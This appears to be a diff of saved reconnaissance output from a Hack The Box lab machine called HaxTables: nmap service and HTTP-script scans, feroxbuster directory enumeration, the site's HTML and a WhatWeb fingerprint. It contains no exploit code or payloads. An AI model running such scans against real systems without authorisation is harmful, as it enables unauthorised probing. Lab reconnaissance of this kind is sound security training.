<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="ssh" product="OpenSSH" version="8.9p1 Ubuntu 3ubuntu0.1" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.9p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="banner" output="SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"/><script id="ssh2-enum-algos" output="&#xa; kex_algorithms: (10)&#xa; curve25519-sha256&#xa; curve25519-sha256@libssh.org&#xa; ecdh-sha2-nistp256&#xa; ecdh-sha2-nistp384&#xa; ecdh-sha2-nistp521&#xa; sntrup761x25519-sha512@openssh.com&#xa; diffie-hellman-group-exchange-sha256&#xa; diffie-hellman-group16-sha512&#xa; diffie-hellman-group18-sha512&#xa; diffie-hellman-group14-sha256&#xa; server_host_key_algorithms: (4)&#xa; rsa-sha2-512&#xa; rsa-sha2-256&#xa; ecdsa-sha2-nistp256&#xa; ssh-ed25519&#xa; encryption_algorithms: (6)&#xa; chacha20-poly1305@openssh.com&#xa; aes128-ctr&#xa; aes192-ctr&#xa; aes256-ctr&#xa; aes128-gcm@openssh.com&#xa; aes256-gcm@openssh.com&#xa; mac_algorithms: (10)&#xa; umac-64-etm@openssh.com&#xa; umac-128-etm@openssh.com&#xa; hmac-sha2-256-etm@openssh.com&#xa; hmac-sha2-512-etm@openssh.com&#xa; hmac-sha1-etm@openssh.com&#xa; umac-64@openssh.com&#xa; umac-128@openssh.com&#xa; hmac-sha2-256&#xa; hmac-sha2-512&#xa; hmac-sha1&#xa; compression_algorithms: (2)&#xa; none&#xa; zlib@openssh.com"><table key="kex_algorithms">
<elem>curve25519-sha256</elem>
<elem>curve25519-sha256@libssh.org</elem>
<elem>ecdh-sha2-nistp256</elem>
<elem>ecdh-sha2-nistp384</elem>
<elem>ecdh-sha2-nistp521</elem>
<elem>sntrup761x25519-sha512@openssh.com</elem>
<elem>diffie-hellman-group-exchange-sha256</elem>
<elem>diffie-hellman-group16-sha512</elem>
<elem>diffie-hellman-group18-sha512</elem>
<elem>diffie-hellman-group14-sha256</elem>
</table>
<table key="server_host_key_algorithms">
<elem>rsa-sha2-512</elem>
<elem>rsa-sha2-256</elem>
<elem>ecdsa-sha2-nistp256</elem>
<elem>ssh-ed25519</elem>
</table>
<table key="encryption_algorithms">
<elem>chacha20-poly1305@openssh.com</elem>
<elem>aes128-ctr</elem>
<elem>aes192-ctr</elem>
<elem>aes256-ctr</elem>
<elem>aes128-gcm@openssh.com</elem>
<elem>aes256-gcm@openssh.com</elem>
</table>
<table key="mac_algorithms">
<elem>umac-64-etm@openssh.com</elem>
<elem>umac-128-etm@openssh.com</elem>
<elem>hmac-sha2-256-etm@openssh.com</elem>
<elem>hmac-sha2-512-etm@openssh.com</elem>
<elem>hmac-sha1-etm@openssh.com</elem>
<elem>umac-64@openssh.com</elem>
<elem>umac-128@openssh.com</elem>
<elem>hmac-sha2-256</elem>
<elem>hmac-sha2-512</elem>
<elem>hmac-sha1</elem>
</table>
<table key="compression_algorithms">
<elem>none</elem>
<elem>zlib@openssh.com</elem>
</table>
</script><script id="ssh-auth-methods" output="&#xa; Supported authentication methods: &#xa; publickey&#xa; password"><table key="Supported authentication methods">
<elem>publickey</elem>
<elem>password</elem>
</table>
</script><script id="ssh-hostkey" output="&#xa; 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=&#xa; 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK"><table>
<elem key="fingerprint">4fe3a667a227f9118dc30ed773a02c28</elem>
<elem key="type">ecdsa-sha2-nistp256</elem>
<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=</elem>
<elem key="bits">256</elem>
</table>
<table>
<elem key="fingerprint">816e78766b8aea7d1babd436b7f8ecc4</elem>
<elem key="type">ssh-ed25519</elem>
<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK</elem>
<elem key="bits">256</elem>
</table>
</script></port>
</ports>
<times srtt="39071" rttvar="39071" to="195355"/>
</host>
<taskbegin task="NSE" time="1674932848"/>
<taskend task="NSE" time="1674932848"/>
<taskbegin task="NSE" time="1674932848"/>
<taskend task="NSE" time="1674932848"/>
<runstats><finished time="1674932848" timestr="Sat Jan 28 20:07:28 2023" summary="Nmap done at Sat Jan 28 20:07:28 2023; 1 IP address (1 host up) scanned in 2.73 seconds" elapsed="2.73" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>


@@ -0,0 +1 @@
{"scans":[{"id":"a57702627b854c1c90ad3f96ec543203","url":"http://api.haxtables.htb/","normalized_url":"http://api.haxtables.htb/","scan_type":"Directory","status":"Running","num_requests":30000},{"id":"6809b17a31a54a36b557f8cf36b3e463","url":"http://api.haxtables.htb/v2/","normalized_url":"http://api.haxtables.htb/v2/","scan_type":"Directory","status":"Complete","num_requests":30000},{"id":"e94a0fafa13a47819bc2bf530faad678","url":"http://api.haxtables.htb/v3/","normalized_url":"http://api.haxtables.htb/v3/","scan_type":"Directory","status":"Complete","num_requests":30000},{"id":"2f4dbdcce1364f6099c72ab7ac0b0127","url":"http://api.haxtables.htb/v1/","normalized_url":"http://api.haxtables.htb/v1/","scan_type":"Directory","status":"Complete","num_requests":30000}],"config":{"type":"configuration","wordlist":"/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://api.haxtables.htb","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":50,"timeout":7,"verbosity":0,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":false,"extensions":[],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":false,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg"
,"webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://api.haxtables.htb/","original_url":"http://api.haxtables.htb","path":"/","wildcard":false,"status":200,"method":"GET","content_length":0,"line_count":0,"word_count":0,"headers":{"server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=UTF-8","content-length":"0","date":"Sat, 28 Jan 2023 19:22:46 GMT"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/v2","original_url":"http://api.haxtables.htb","path":"/v2","wildcard":false,"status":301,"method":"GET","content_length":319,"line_count":9,"word_count":28,"headers":{"server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=iso-8859-1","location":"http://api.haxtables.htb/v2/","date":"Sat, 28 Jan 2023 19:22:46 GMT","content-length":"319"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/v3","original_url":"http://api.haxtables.htb","path":"/v3","wildcard":false,"status":301,"method":"GET","content_length":319,"line_count":9,"word_count":28,"headers":{"content-length":"319","content-type":"text/html; charset=iso-8859-1","date":"Sat, 28 Jan 2023 19:22:46 GMT","server":"Apache/2.4.52 (Ubuntu)","location":"http://api.haxtables.htb/v3/"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/v1","original_url":"http://api.haxtables.htb","path":"/v1","wildcard":false,"status":301,"method":"GET","content_length":319,"line_count":9,"word_count":28,"headers":{"server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=iso-8859-1","date":"Sat, 28 Jan 2023 19:22:46 
GMT","content-length":"319","location":"http://api.haxtables.htb/v1/"},"extension":""},{"type":"response","url":"http://api.haxtables.htb/server-status","original_url":"http://api.haxtables.htb","path":"/server-status","wildcard":false,"status":403,"method":"GET","content_length":282,"line_count":9,"word_count":28,"headers":{"content-length":"282","date":"Sat, 28 Jan 2023 19:22:48 GMT","server":"Apache/2.4.52 (Ubuntu)","content-type":"text/html; charset=iso-8859-1"},"extension":""}],"statistics":{"type":"statistics","timeouts":0,"requests":7411,"expected_per_scan":30000,"total_expected":120000,"errors":12,"successes":7,"redirects":3,"client_errors":7389,"server_errors":0,"total_scans":4,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":7,"status_301s":3,"status_302s":0,"status_401s":0,"status_403s":1,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":5,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":12,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]}


@@ -0,0 +1,56 @@
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>HaxTables</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="assets/css/main.css">
<script src="./assets/js/main.js"></script>
</head>
<body>
<h1 align="center">HaxTables</h1>
<br><br>
<div class="container">
<nav class="navbar navbar-inverse">
<div class="container-fluid">
<div class="navbar-header">
<a class="navbar-brand" href="/">HaxTables</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="/">Home</a></li>
<li class="dropdown"><a class="dropdown-toggle" data-toggle="dropdown" href="#">Convertions<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="/index.php?page=string">String</a></li>
<li><a href="/index.php?page=integer">Integer</a></li>
<li><a href="/index.php?page=image">Images</a></li>
</ul>
</li>
<li><a href="#">About us</a></li>
<li><a href="/index.php?page=api">API</a></li>
</ul>
</div>
</nav>
<p align="center">Free online String and Number converter. Just load your input and they will automatically get converted to selected format. A collection of useful utilities for working with String and Integer values. All are simple, free and easy to use. There are no ads, popups or other garbage!</p>
<p align="center">
<img src="../assets/img/index.png">
</p>
</div>
</body>
</html>


@@ -0,0 +1,32 @@
403 GET 9l 28w 277c http://10.129.123.2/.htaccess
403 GET 9l 28w 277c http://10.129.123.2/.hta
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.txt
403 GET 9l 28w 277c http://10.129.123.2/.hta.txt
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.txt
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.html
403 GET 9l 28w 277c http://10.129.123.2/.hta.html
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.html
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.php
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.asp
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.php
403 GET 9l 28w 277c http://10.129.123.2/.hta.asp
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.asp
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.aspx
403 GET 9l 28w 277c http://10.129.123.2/.hta.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.aspx
403 GET 9l 28w 277c http://10.129.123.2/.htaccess.jsp
403 GET 9l 28w 277c http://10.129.123.2/.hta.jsp
200 GET 48l 137w 0c http://10.129.123.2/index.php
403 GET 9l 28w 277c http://10.129.123.2/.htpasswd.jsp
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
200 GET 48l 137w 0c http://10.129.123.2/
403 GET 9l 28w 277c http://10.129.123.2/.html
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
200 GET 1l 2w 0c http://10.129.123.2/handler.php
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
403 GET 9l 28w 277c http://10.129.123.2/server-status


@@ -0,0 +1,32 @@
200 GET 48l 137w 0c http://10.129.123.2/index.php
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/css/ (Apache)
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/js/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/img (Apache)
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
200 GET 48l 137w 0c http://10.129.123.2/
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
403 GET 9l 28w 277c http://10.129.123.2/.html
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
200 GET 5l 53w 375c http://10.129.123.2/includes/index.html
200 GET 1l 2w 20c http://10.129.123.2/includes/image.html
200 GET 110l 344w 3672c http://10.129.123.2/includes/api.html
200 GET 48l 137w 0c http://10.129.123.2/index.php
200 GET 31l 80w 1019c http://10.129.123.2/assets/js/main.js
200 GET 167l 329w 3025c http://10.129.123.2/assets/css/main.css
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/css/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/js/ (Apache)
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/ (Apache)
200 GET 2206l 13654w 619037c http://10.129.123.2/assets/img/index.png
200 GET 48l 137w 0c http://10.129.123.2/
403 GET 9l 28w 277c http://10.129.123.2/.html
MSG 0.000 feroxbuster::heuristics detected directory listing: http://10.129.123.2/assets/img/ (Apache)
403 GET 9l 28w 277c http://10.129.123.2/.php
301 GET 9l 28w 313c http://10.129.123.2/assets => http://10.129.123.2/assets/
301 GET 9l 28w 315c http://10.129.123.2/includes => http://10.129.123.2/includes/
200 GET 5l 53w 375c http://10.129.123.2/includes/index.html
200 GET 1l 2w 20c http://10.129.123.2/includes/image.html
200 GET 110l 344w 3672c http://10.129.123.2/includes/api.html


@@ -0,0 +1,140 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 80 "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.025s latency).
Scanned at 2023-01-28 20:07:26 CET for 160s
Bug in http-security-headers: no string output.
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
|_http-mobileversion-checker: No mobile version detected.
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-referer-checker:
| Spidering limited to: maxpagecount=30
| https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js
|_ https://maxcdn.bootstrapcdn.com:443/bootstrap/3.4.1/js/bootstrap.min.js
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-fetch: Please enter the complete path of the directory to save data in.
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-feed: Couldn't find any feeds.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-useragent-tester:
| Status for browser useragent: 200
| Allowed User Agents:
| Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
| libwww
| lwp-trivial
| libcurl-agent/1.0
| PHP/
| Python-urllib/2.5
| GT::WWW
| Snoopy
| MFC_Tear_Sample
| HTTP::Lite
| PHPCrawl
| URI::Fetch
| Zend_Http_Client
| http client
| PECL::HTTP
| Wget/1.13.4 (linux-gnu)
|_ WWW-Mechanize/1.34
| http-headers:
| Date: Sat, 28 Jan 2023 19:07:19 GMT
| Server: Apache/2.4.52 (Ubuntu)
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=encoding.htb
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 29
| Comment:
| /* The textarea itself */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 14
| Comment:
| /* Containing areas */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 41
| Comment:
| /* The status bar */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 1
| Comment:
| /* Import Google Font */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 63
| Comment:
| /* The submit button */
|
| Path: http://encoding.htb:80/assets/css/main.css
| Line number: 4
| Comment:
|_ /* RESET */
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-errors: Couldn't find any error pages.
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
| http-sitemap-generator:
| Directory structure:
| /
| Other: 1; php: 1
| /assets/css/
| css: 1
| /assets/img/
| png: 1
| /assets/js/
| js: 1
| Longest directory structure:
| Depth: 2
| Dir: /assets/img/
| Total files found (by extension):
|_ Other: 1; css: 1; js: 1; php: 1; png: 1
|_http-date: Sat, 28 Jan 2023 19:07:18 GMT; -18s from local time.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-traceroute:
| HTML title
| Hop #1: 400 Proxy Error
| Hop #2: HaxTables
| Hop #3: HaxTables
| Status Code
| Hop #1: 400
| Hop #2: 200
| Hop #3: 200
| content-type
| Hop #1: text/html; charset=iso-8859-1
| Hop #2: text/html; charset=UTF-8
| Hop #3: text/html; charset=UTF-8
| content-length
| Hop #1: 424
| Hop #2
|_ Hop #3
|_http-title: HaxTables
|_http-malware-host: Host appears to be clean
| http-enum:
|_ /includes/: Potentially interesting folder
| http-php-version: Logo query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_Credits query returned unknown hash 6f7d4fa5b2f90ff61821fd1e824a06fa
|_http-config-backup: ERROR: Script execution failed (use -d to debug)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-chrono: Request times for /; avg: 172.22ms; min: 158.15ms; max: 186.15ms
| http-vhosts:
|_128 names had status 200
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:10:06 2023 -- 1 IP address (1 host up) scanned in 160.94 seconds

Binary file not shown.



@@ -0,0 +1,71 @@
WhatWeb report for http://10.129.123.2:80
Status : 200 OK
Title : HaxTables
IP : 10.129.123.2
Country : RESERVED, ZZ
Summary : Apache[2.4.52], Bootstrap[3.4.1], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], JQuery[3.6.0], Script, X-UA-Compatible[IE=edge]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.52 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Version : 3.4.1
Version : 3.4.1
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.52 (Ubuntu) (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Version : 3.6.0
Website : http://jquery.com/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-UA-Compatible ]
This plugin retrieves the X-UA-Compatible value from the
HTTP header and meta http-equiv tag. - More Info:
http://msdn.microsoft.com/en-us/library/cc817574.aspx
String : IE=edge
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 28 Jan 2023 19:07:10 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 814
Connection: close
Content-Type: text/html; charset=UTF-8


@@ -0,0 +1,84 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 80 &quot;-&#45;script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)&quot; -oN /home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt -oX /home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml 10.129.123.2" start="1674932845" startstr="Sat Jan 28 20:07:25 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="80"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932846"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932846"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932846"/>
<taskbegin task="SYN Stealth Scan" time="1674932846"/>
<taskend task="SYN Stealth Scan" time="1674932846" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674932846"/>
<taskend task="Service scan" time="1674932852" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674932852"/>
<taskprogress task="NSE" time="1674932883" percent="99.02" remaining="1" etc="1674932883"/>
<taskprogress task="NSE" time="1674932913" percent="99.67" remaining="1" etc="1674932913"/>
<taskprogress task="NSE" time="1674932943" percent="99.67" remaining="1" etc="1674932943"/>
<taskprogress task="NSE" time="1674932973" percent="99.67" remaining="1" etc="1674932973"/>
<taskprogress task="NSE" time="1674933003" percent="99.67" remaining="1" etc="1674933003"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<taskbegin task="NSE" time="1674933006"/>
<taskend task="NSE" time="1674933006"/>
<host starttime="1674932846" endtime="1674933006"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/><service name="http" product="Apache httpd" version="2.4.52" extrainfo="(Ubuntu)" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.52</cpe></service><script id="http-drupal-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args number=&lt;number|all&gt; for deeper analysis)"/><script id="http-mobileversion-checker" output="No mobile version detected."/><script id="http-server-header" output="Apache/2.4.52 (Ubuntu)"><elem>Apache/2.4.52 (Ubuntu)</elem>
</script><script id="http-wordpress-enum" output="Nothing found amongst the top 100 resources,use -&#45;script-args search-limit=&lt;number|all&gt; for deeper analysis)"/><script id="http-vuln-cve2017-1001000" output="ERROR: Script execution failed (use -d to debug)"/><script id="http-referer-checker" output="&#xa;Spidering limited to: maxpagecount=30&#xa; https://ajax.googleapis.com:443/ajax/libs/jquery/3.6.0/jquery.min.js&#xa; https://maxcdn.bootstrapcdn.com:443/bootstrap/3.4.1/js/bootstrap.min.js&#xa;"/><script id="http-wordpress-users" output="[Error] Wordpress installation was not found. We couldn&apos;t find wp-login.php"/><script id="http-fetch" output="Please enter the complete path of the directory to save data in."><elem key="ERROR">Please enter the complete path of the directory to save data in.</elem>
</script><script id="http-devframework" output="Couldn&apos;t determine the underlying framework or CMS. Try increasing &apos;httpspider.maxpagecount&apos; value to spider more pages."/><script id="http-litespeed-sourcecode-download" output="Request with null byte did not work. This web server might not be vulnerable"/><script id="http-feed" output="Couldn&apos;t find any feeds."/><script id="http-jsonp-detection" output="Couldn&apos;t find any JSONP endpoints."/><script id="http-csrf" output="Couldn&apos;t find any CSRF vulnerabilities."/><script id="http-useragent-tester" output="&#xa; Status for browser useragent: 200&#xa; Allowed User Agents: &#xa; Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)&#xa; libwww&#xa; lwp-trivial&#xa; libcurl-agent/1.0&#xa; PHP/&#xa; Python-urllib/2.5&#xa; GT::WWW&#xa; Snoopy&#xa; MFC_Tear_Sample&#xa; HTTP::Lite&#xa; PHPCrawl&#xa; URI::Fetch&#xa; Zend_Http_Client&#xa; http client&#xa; PECL::HTTP&#xa; Wget/1.13.4 (linux-gnu)&#xa; WWW-Mechanize/1.34"><elem key="Status for browser useragent">200</elem>
<table key="Allowed User Agents">
<elem>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</elem>
<elem>libwww</elem>
<elem>lwp-trivial</elem>
<elem>libcurl-agent/1.0</elem>
<elem>PHP/</elem>
<elem>Python-urllib/2.5</elem>
<elem>GT::WWW</elem>
<elem>Snoopy</elem>
<elem>MFC_Tear_Sample</elem>
<elem>HTTP::Lite</elem>
<elem>PHPCrawl</elem>
<elem>URI::Fetch</elem>
<elem>Zend_Http_Client</elem>
<elem>http client</elem>
<elem>PECL::HTTP</elem>
<elem>Wget/1.13.4 (linux-gnu)</elem>
<elem>WWW-Mechanize/1.34</elem>
</table>
</script><script id="http-headers" output="&#xa; Date: Sat, 28 Jan 2023 19:07:19 GMT&#xa; Server: Apache/2.4.52 (Ubuntu)&#xa; Connection: close&#xa; Content-Type: text/html; charset=UTF-8&#xa; &#xa; (Request type: HEAD)&#xa;"/><script id="http-comments-displayer" output="&#xa;Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=encoding.htb&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 29&#xa; Comment: &#xa; /* The textarea itself */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 14&#xa; Comment: &#xa; /* Containing areas */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 41&#xa; Comment: &#xa; /* The status bar */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 1&#xa; Comment: &#xa; /* Import Google Font */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 63&#xa; Comment: &#xa; /* The submit button */&#xa; &#xa; Path: http://encoding.htb:80/assets/css/main.css&#xa; Line number: 4&#xa; Comment: &#xa; /* RESET */&#xa;"/><script id="http-dombased-xss" output="Couldn&apos;t find any DOM based XSS."/><script id="http-errors" output="Couldn&apos;t find any error pages."/><script id="http-fileupload-exploiter" output="&#xa; &#xa; Couldn&apos;t find a file-type field.&#xa; &#xa; Couldn&apos;t find a file-type field."><table>
<elem>Couldn&apos;t find a file-type field.</elem>
</table>
<table>
<elem>Couldn&apos;t find a file-type field.</elem>
</table>
